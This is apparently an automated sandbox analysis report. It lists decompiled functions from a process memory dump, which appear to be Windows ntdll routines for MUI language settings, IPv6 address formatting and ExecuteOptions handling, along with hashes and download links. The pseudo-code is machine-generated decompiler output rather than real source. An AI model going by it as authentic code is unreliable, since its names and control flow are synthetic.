Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456

Uniqueness

Uniqueness Score: -1.00%

Function 0090FFFC, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2170985187.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2170979319.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171051048.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171054885.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171058930.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171062622.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171066339.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171091858.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B

Uniqueness

Uniqueness Score: -1.00%

Function 0090FF34, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2170985187.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2170979319.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171051048.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171054885.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171058930.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171062622.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171066339.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171091858.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A

Uniqueness

Uniqueness Score: -1.00%

Function 00938788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00938788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00938460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0091E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0093718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00938460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0093718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00938460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00938460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00938460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0093718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0091E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00912340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0092E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0091E2A8(_t322,  &_v68, _v16);
								if(E00935553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0092E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0091E2A8(_t322,  &_v68, _t236);
								if(E00935553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0093718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0091E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00912340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0092E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0091E2A8(_v12,  &_v68, _v16);
							if(E00935553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0092E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0091E2A8(_t322,  &_v68, _t269);
							if(E00935553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0093718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0091E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00912340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0092E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0091E2A8(_v12,  &_v68, _v16);
						if(E00935553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0092E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0091E2A8(_t322,  &_v68, _t296);
						if(E00935553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x00938788
0x00938788
0x00938791
0x00938794
0x00938798
0x0093879b
0x0093879e
0x009387a1
0x009387a4
0x009387a7
0x009387aa
0x009387af
0x00981ad3
0x00938b0a
0x00938b0d
0x00938b13
0x00938b19
0x00938b1f
0x00938b25
0x00938b2b
0x00938b31
0x00938b37
0x00938b3d
0x00938b46
0x00938b46
0x009387c6
0x009387d0
0x00981ae0
0x00981ae6
0x00981af8
0x00981af8
0x00981afd
0x00981afe
0x00981b01
0x00981b06
0x00981b06
0x009387d6
0x009387f2
0x009387f7
0x00938807
0x0093880a
0x0093880f
0x00938810
0x00938813
0x00938818
0x00938818
0x0093882c
0x00938831
0x00938838
0x00938908
0x00938920
0x009389f0
0x00938a08
0x00938af6
0x00938af6
0x00938af8
0x00938afb
0x00981beb
0x00981beb
0x00938b04
0x00981bf8
0x00981c0e
0x00981c13
0x00981c16
0x00981c16
0x00981bf8
0x00000000
0x00938b04
0x00938a0e
0x00938a11
0x00938a14
0x00938a15
0x00938a18
0x00938a22
0x00938b59
0x00938a28
0x00938a3c
0x00938a3c
0x00938a42
0x00981bb0
0x00981b11
0x00981b11
0x00000000
0x00938a48
0x00938a51
0x00938a5b
0x00938a5e
0x00938a61
0x00938a69
0x00938a69
0x00938a6d
0x00000000
0x00000000
0x00938a74
0x00938a7c
0x00938a7d
0x00938a91
0x00938a93
0x00938a93
0x00938a98
0x00938a9b
0x00938aa1
0x00938aa1
0x00938aa4
0x00938aaa
0x00938ab1
0x00938ac5
0x00938ac7
0x00938ac7
0x00938ac5
0x00938ace
0x00981bc9
0x00981bce
0x00981bd2
0x00981bd2
0x00938ad8
0x00938aeb
0x00938aeb
0x00938af0
0x00938af4
0x00000000
0x00938af4
0x00938a42
0x00938926
0x00938929
0x0093892c
0x0093892d
0x00938930
0x00938935
0x0093893a
0x00938b51
0x00938940
0x00938954
0x00938954
0x0093895a
0x00981b63
0x00000000
0x00938960
0x00938969
0x00938973
0x00938976
0x00938979
0x0093897e
0x00938981
0x00938981
0x00938986
0x00000000
0x00000000
0x00981b6e
0x00981b74
0x00981b7b
0x00981b8f
0x00981b91
0x00981b91
0x00981b99
0x00981b9c
0x00981ba2
0x00981ba2
0x0093898c
0x00938992
0x00938999
0x009389ad
0x00981ba8
0x00981ba8
0x009389ad
0x009389b6
0x009389c8
0x009389cd
0x009389d0
0x009389d0
0x009389d6
0x009389e8
0x009389e8
0x009389ed
0x00000000
0x009389ed
0x0093895a
0x0093883e
0x00938841
0x00938844
0x00938845
0x00938848
0x0093884d
0x00938852
0x00938b49
0x00938858
0x0093886c
0x0093886c
0x00938872
0x00981b0e
0x00000000
0x00938878
0x00938881
0x0093888b
0x0093888e
0x00938891
0x00938896
0x00938899
0x00938899
0x0093889e
0x00000000
0x00000000
0x00981b21
0x00981b27
0x00981b2e
0x00981b42
0x00981b44
0x00981b44
0x00981b4c
0x00981b4f
0x00981b55
0x00981b55
0x009388a4
0x009388aa
0x009388b1
0x009388c5
0x00981b5b
0x00981b5b
0x009388c5
0x009388ce
0x009388e0
0x009388e5
0x009388e8
0x009388e8
0x009388ee
0x00938900
0x00938900
0x00938905
0x00000000
0x00938905

APIs

_wcspbrk.LIBCMT ref: 00938891
_wcspbrk.LIBCMT ref: 00938979
_wcspbrk.LIBCMT ref: 00938A61
_wcspbrk.LIBCMT ref: 00938A9B
_wcspbrk.LIBCMT ref: 00981B9C

Strings

Kernel-MUI-Number-Allowed, xrefs: 009387E6
Kernel-MUI-Language-SKU, xrefs: 009389FC
Kernel-MUI-Language-Disallowed, xrefs: 00938914
WindowsExcludedProcs, xrefs: 009387C1
Kernel-MUI-Language-Allowed, xrefs: 00938827

Memory Dump Source

Source File: 00000005.00000002.2170985187.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2170979319.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171051048.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171054885.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171058930.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171062622.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171066339.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171091858.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: ce9806898184e62619ce85bde7b7d4e482c459d6ada83373159015600ac85896
Instruction ID: 7933886f3f67479ed92c2c05ac5fc6f875a652e98cfaea1cb7981e3f0119657d
Opcode Fuzzy Hash: ce9806898184e62619ce85bde7b7d4e482c459d6ada83373159015600ac85896
Instruction Fuzzy Hash: 4EF1C4B2D00249EFCF11EF95C981AEEB7B8FB48300F15446AF505A7611EB35AA85DF60

Uniqueness

Uniqueness Score: -1.00%

Function 009513CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E009513CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00947707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x912926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00947707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x919cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00947707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00947707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00947707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00947707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x009513d5
0x009513d9
0x009513dc
0x009513de
0x009513e1
0x009513e8
0x009513ee
0x0097e8fd
0x00000000
0x0097e921
0x0097e921
0x0097e928
0x0097e982
0x0097e98a
0x00000000
0x0097e99a
0x0097e99e
0x0097e9a3
0x0097e9a8
0x0097e9b9
0x0097e978
0x00000000
0x0097e978
0x0097e98a
0x0097e92a
0x0097e931
0x0097e944
0x0097e944
0x0097e950
0x0097e954
0x0097e959
0x0097e95e
0x0097e963
0x0097e970
0x00000000
0x0097e975
0x0097e93b
0x0097e980
0x00000000
0x0097e980
0x0097e942
0x0097e94b
0x00000000
0x0097e94b
0x00000000
0x0097e942
0x009513f4
0x009513f4
0x009513f9
0x009513fc
0x009513ff
0x00951406
0x0097e9cc
0x0097e9d2
0x0097e9d2
0x0097e9cc
0x0095140c
0x00951411
0x00951431
0x0095143a
0x0095143c
0x0095143f
0x0095143f
0x00951442
0x00951447
0x009514a8
0x009514ac
0x0097e9e2
0x0097e9e7
0x0097e9ec
0x0097ea05
0x0097ea05
0x00000000
0x00951449
0x00000000
0x00951449
0x0095144c
0x00951459
0x00951462
0x00951469
0x0095146a
0x00951470
0x00951473
0x00951476
0x00951476
0x00951490
0x00951495
0x0095138e
0x00951390
0x00951397
0x00951398
0x00951399
0x009513a1
0x009513a4
0x009513a4
0x00951498
0x0095149c
0x0095149f
0x009514a2
0x00000000
0x00000000
0x009514a4
0x00000000
0x009514a4
0x00951413
0x00951415
0x00951416
0x00951419
0x0095141c
0x00951422
0x009513b7
0x009513bc
0x009513bf
0x009513bf
0x009513c2
0x00951424
0x00951424
0x00951424
0x00951427
0x0095142b
0x0095142c
0x0095142c
0x0095142c
0x00000000
0x0095141c
0x00951411

APIs

___swprintf_l.LIBCMT ref: 0095146B
___swprintf_l.LIBCMT ref: 00951490
___swprintf_l.LIBCMT ref: 0097E970

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 0097E9B0
ffff:, xrefs: 0097E94B
::%hs%u.%u.%u.%u, xrefs: 0097E967
:%u.%u.%u.%u, xrefs: 0097E9F4

Memory Dump Source

Source File: 00000005.00000002.2170985187.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2170979319.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171051048.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171054885.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171058930.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171062622.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171066339.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171091858.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 94cdbd04d4cbbdfe01840ad0d72238f5854689f7170f7cd68456f9c9dac92a12
Instruction ID: 72cd99971ccd6134a5dcfda58467dc29bfd970ad00d573ec60a484d5d7635a30
Opcode Fuzzy Hash: 94cdbd04d4cbbdfe01840ad0d72238f5854689f7170f7cd68456f9c9dac92a12
Instruction Fuzzy Hash: 0C615872A00659AACF34CF9AC8909BFBBB9EFD4305B54C42DF9DA47540D334AA44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00947EFD, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00947EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x9f2088; // 0x7750376d
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00947F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00963F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0091DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x9f4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00963F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00920D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00963F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00928375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00963F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0098E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00963F92();
					_t38 = 1;
					L2:
					return E0091E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x00947f08
0x00947f0f
0x00947f12
0x00947f1b
0x00947f31
0x00963ead
0x00963eb4
0x00000000
0x00000000
0x00963eba
0x00963ecd
0x00963ed2
0x00963ee1
0x00963ee7
0x00963eec
0x00963f12
0x00963f18
0x00963f1a
0x00000000
0x00000000
0x00963f20
0x00963f26
0x00963f28
0x00000000
0x00000000
0x00963f2e
0x00963f30
0x00000000
0x00000000
0x00963f3a
0x00963f3b
0x00963f53
0x00963f64
0x00963f69
0x00963f6c
0x00963f6d
0x00963f6f
0x0096e304
0x0096e30f
0x0096e315
0x0096e31e
0x0096e321
0x0096e327
0x0096e329
0x00000000
0x00000000
0x00000000
0x00000000
0x0096e32f
0x0096e32f
0x0096e337
0x0096e33a
0x0096e33b
0x0096e33d
0x0096e33f
0x0096e341
0x0096e341
0x0096e34e
0x0096e353
0x0096e358
0x0096e35d
0x0096e35f
0x00000000
0x00000000
0x0096e365
0x0096e365
0x0096e368
0x0096e36e
0x00000000
0x00000000
0x0096e374
0x0096e32f
0x00963f75
0x00963f7a
0x00963f7c
0x00963f7e
0x00963f86
0x00947f39
0x00947f47
0x00947f47
0x00947f37
0x00947f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00963F12

Strings

CLIENT(ntdll): Processing section info %ws..., xrefs: 0096E345
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00963EC4
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0096E2FB
ExecuteOptions, xrefs: 00963F04
Execute=1, xrefs: 00963F5E
m7Pw, xrefs: 00947F08
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00963F4A
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00963F75

Memory Dump Source

Source File: 00000005.00000002.2170985187.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2170979319.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171051048.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171054885.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171058930.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171062622.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171066339.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171091858.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: BaseDataModuleQuery
